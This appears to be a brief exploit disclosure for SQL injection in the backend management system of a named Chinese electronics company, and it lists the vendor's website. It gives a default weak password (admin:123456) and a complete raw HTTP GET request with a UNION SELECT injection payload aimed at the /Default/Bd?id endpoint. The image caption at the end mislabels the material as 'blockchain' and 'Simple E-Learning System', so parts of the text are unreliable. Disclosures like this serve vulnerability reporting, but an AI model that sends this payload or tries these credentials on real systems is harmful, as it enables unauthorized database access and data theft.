Exploit Title: SQL injection exists in the background management system /Default/Bd?id and /Default/Page?id of Shaoxing Punctuation Electronic Technology Co., LTD
Vendor Homepage: http://www.xsjczx.com/
Weak password: admin:123456 SQL injection exists in the background management system /Default/Bd?id and /Default/Page?id of Shaoxing Punctuation Electronic Technology Co., LTD
GET /Default/Bd?id=-e7fa628182201505181659430599563%27union%20select%201,2,3,4,5,6,7%20--+ HTTP/1.1
Host: TARGET:PORT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=pjcyha1p55kts5fkgesrgehn
Upgrade-Insecure-Requests: 1
![blockchain](https://github.com/Peanut886/Vulnerability/blob/main/imgs/2022-12-2-1.jpg https://github.com/Peanut886/Vulnerability/blob/main/imgs/2022-12-2-2.jpg https://github.com/Peanut886/Vulnerability/blob/main/imgs/2022-12-2-3.jpg "Simple E-Learning System")